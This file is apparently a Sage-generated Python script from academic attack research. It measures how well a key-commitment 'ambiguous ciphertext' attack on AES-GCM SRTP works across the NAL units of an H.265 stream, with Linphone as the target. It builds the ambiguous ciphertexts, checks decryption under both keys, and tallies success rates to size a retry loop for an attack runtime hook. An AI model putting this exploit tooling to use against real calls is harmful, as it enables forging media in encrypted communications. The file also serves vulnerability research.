"""Robustness sweep: run the per-packet ambiguous-ciphertext attack against
every NAL in the adversary H.265 stream that fits a single RTP packet,
and report per-NAL outcomes. Three things can go wrong on any given NAL:

  S0 — size: the NAL plus Filler Data trailer overshoots the RTP MTU.
       Paper Table 3 excludes Fragmentation Units from the attack, so
       such NALs are simply skipped (not counted as failures).

  S1 — start-code 0x000001 contamination: after building the ambiguous
       ciphertext, the K_NEW receiver's recovered plaintext might
       accidentally contain a 0x000001 start code in the random-looking
       region. If that happens *before* the adversary NAL boundary the
       H.265 RTP depacketizer can be tricked into pretending the K_NEW
       plaintext also contains a valid NAL — undesirable, the attack
       paper §5.4.2.2 describes a SEQ-bumping retry loop to dodge this.

  S2 — adjustment slot in K_NEW recovers to bytes that look like a
       canonical start code 0x000001. Same problem as S1 but localised
       to the adjustment block.

We do NOT yet implement the SEQ-bump retry; we just count how often the
naive single-shot attack succeeds. This bounds the worst-case retry
budget the runtime hook will need.

Numbers reported:
  - per-NAL-type tally of (eligible, attack_ok, S1_hit, S2_hit)
  - overall single-shot success rate
  - a small sample of failing NALs (offset of the spurious 0x000001 in
    the K_NEW recovered bytes), to inform avoidance-loop design.
"""


# This file was *autogenerated* from the file attack/crypto/test_robustness.sage
from sage.all_cmdline import *   # import sage library

_sage_const_1300 = Integer(1300); _sage_const_0 = Integer(0); _sage_const_96 = Integer(96); _sage_const_0xdeadbeef = Integer(0xdeadbeef); _sage_const_1 = Integer(1); _sage_const_3 = Integer(3); _sage_const_16 = Integer(16); _sage_const_0x00000007 = Integer(0x00000007); _sage_const_0xFFFF = Integer(0xFFFF); _sage_const_100p0 = RealNumber('100.0'); _sage_const_5 = Integer(5)
from binascii import hexlify, unhexlify
from collections import defaultdict, namedtuple

from Crypto.Cipher import AES

load('attack/crypto/util.sage')
load('attack/crypto/gcm.sage')
load('attack/crypto/srtp_kdf.sage')
load('attack/crypto/h265_nal.sage')
load('attack/crypto/rtp_header.sage')
load('attack/crypto/test_packet_ambiguous.sage')


MTU_PAYLOAD = _sage_const_1300    # rough single-NAL RTP payload upper bound
START_CODE = b"\x00\x00\x01"


Outcome = namedtuple("Outcome", [
    "nal_index", "nal_type", "nal_size",
    "ok", "k_old_recover_ok", "k_new_has_start_code", "k_new_first_sc_offset",
])


def find_start_code(buf: bytes, end_excl: int) -> int:
    """Return offset of first occurrence of 0x000001 in buf[:end_excl],
    or -1 if absent."""
    return buf.find(START_CODE, _sage_const_0 , end_excl)


def attempt_one_nal(idx, adversary_nal, k_old, k_new, master_salt,
                    ssrc, roc, seq, csrcs):
    """Try the naive single-shot attack on one NAL. Returns an Outcome."""
    nt = nal_type(adversary_nal[_sage_const_0 ])
    sz = len(adversary_nal)

    pt, adj_off = build_packet_plaintext(adversary_nal)
    if len(pt) > MTU_PAYLOAD:
        return None  # size-exceeded (paper Table 3: Fragmentation Unit, skip)

    aad = build_rtp_header(payload_type=_sage_const_96 , seq=seq, timestamp=_sage_const_0xdeadbeef ,
                           ssrc=ssrc, csrcs=csrcs)

    r = build_ambiguous_under_inner_keys(
        pt, k_old, k_new, master_salt, ssrc, roc, seq,
        adjustment_block_offset=adj_off,
        aad=aad,
    )

    # K_OLD: must recover adversary NAL bit-for-bit.
    cipher_old = AES.new(r["K_enc_old"], AES.MODE_GCM, nonce=r["nonce_old"])
    cipher_old.update(aad)
    try:
        pt_old = cipher_old.decrypt_and_verify(r["ciphertext"], r["tag16"])
    except ValueError:
        return Outcome(idx, nt, sz, False, False, False, -_sage_const_1 )
    parsed_old = split_nal_units(pt_old)
    k_old_ok = bool(parsed_old) and parsed_old[_sage_const_0 ] == adversary_nal

    # K_NEW: must verify, and the recovered bytes must NOT carry a
    # 0x000001 start code in the leading random region (before the
    # adversary-NAL start-code-3 at offset 0). We scan the prefix up
    # to and including the adjustment-block region — anything past the
    # FD_NUT NAL's trailing 0x80 byte is harmless (paper §5.4.2.2).
    cipher_new = AES.new(r["K_enc_new"], AES.MODE_GCM, nonce=r["nonce_new"])
    cipher_new.update(aad)
    try:
        pt_new = cipher_new.decrypt_and_verify(r["ciphertext"], r["tag16"])
    except ValueError:
        return Outcome(idx, nt, sz, False, k_old_ok, False, -_sage_const_1 )

    # Skip past the legitimate adversary-NAL start code (offset 0).
    scan_from = _sage_const_3 
    scan_to = adj_off + _sage_const_16   # we still care about the adjustment region;
                            # anything past it is parser-irrelevant.
    sc_off = pt_new.find(START_CODE, scan_from, scan_to)
    k_new_has_sc = (sc_off >= _sage_const_0 )

    overall_ok = k_old_ok and (not k_new_has_sc)
    return Outcome(idx, nt, sz, overall_ok, k_old_ok, k_new_has_sc, sc_off)


def main():
    path = "src-video/video_01_main_1920x1440.h265"
    with open(path, "rb") as f:
        nals = split_nal_units(f.read())
    print(f"[+] loaded {len(nals)} NAL units from {path}")

    k_old = unhexlify("000102030405060708090a0b0c0d0e0f"
                     "101112131415161718191a1b1c1d1e1f")
    k_new = unhexlify("ffeeddccbbaa99887766554433221100"
                     "fedcba9876543210ffeeddccbbaa9988")
    # 12-byte master_salt (as Linphone passes via inner_send_key setter)
    master_salt = unhexlify("aabbccddeeff001122334455")
    ssrc, roc = _sage_const_0xdeadbeef , _sage_const_0x00000007 
    csrcs = []   # CC=0 (most common in Linphone)

    outcomes = []
    skipped_size = _sage_const_0 
    for i, nal in enumerate(nals):
        o = attempt_one_nal(i, nal, k_old, k_new, master_salt, ssrc, roc,
                            seq=(i & _sage_const_0xFFFF ), csrcs=csrcs)
        if o is None:
            skipped_size += _sage_const_1 
            continue
        outcomes.append(o)

    print(f"[+] attempted {len(outcomes)} NALs (skipped {skipped_size} "
          f"NALs that exceeded MTU — fragmentation territory, paper Table 3)")

    # Per-type tally.
    by_type = defaultdict(lambda: {"n": _sage_const_0 , "ok": _sage_const_0 , "k_old_fail": _sage_const_0 ,
                                    "k_new_sc": _sage_const_0 })
    for o in outcomes:
        d = by_type[o.nal_type]
        d["n"] += _sage_const_1 
        if o.ok: d["ok"] += _sage_const_1 
        if not o.k_old_recover_ok: d["k_old_fail"] += _sage_const_1 
        if o.k_new_has_start_code: d["k_new_sc"] += _sage_const_1 

    print()
    print(f"  {'type':>4}  {'name':14s}  {'n':>5}  {'ok':>5}  "
          f"{'K_OLD fail':>10}  {'K_NEW has SC':>13}")
    for nt in sorted(by_type):
        d = by_type[nt]
        name = NAL_TYPE_NAMES.get(nt, "-")
        print(f"  {nt:4d}  {name:14s}  {d['n']:5d}  {d['ok']:5d}  "
              f"{d['k_old_fail']:10d}  {d['k_new_sc']:13d}")

    total_n  = sum(d["n"]  for d in by_type.values())
    total_ok = sum(d["ok"] for d in by_type.values())
    total_sc = sum(d["k_new_sc"] for d in by_type.values())
    print()
    print(f"[+] overall single-shot success: {total_ok}/{total_n} "
          f"({_sage_const_100p0 *total_ok/total_n:.1f}%)")
    print(f"[+] K_OLD recover failures      : "
          f"{sum(d['k_old_fail'] for d in by_type.values())}/{total_n}  "
          f"(should be 0 — pure cryptographic check)")
    print(f"[+] K_NEW start-code contamination: {total_sc}/{total_n} "
          f"({_sage_const_100p0 *total_sc/total_n:.1f}%) — these need a SEQ-bump "
          f"retry loop in the runtime hook")

    # Sample first few S1 hits to inspect the SC offsets.
    sc_hits = [o for o in outcomes if o.k_new_has_start_code][:_sage_const_5 ]
    if sc_hits:
        print()
        print("[*] sample SC-contamination hits (first 5):")
        for o in sc_hits:
            print(f"    nal#{o.nal_index} type={o.nal_type} "
                  f"({NAL_TYPE_NAMES.get(o.nal_type,'-')}) sz={o.nal_size} B  "
                  f"K_NEW first SC at byte {o.k_new_first_sc_offset}")


if __name__ == "__main__":
    main()

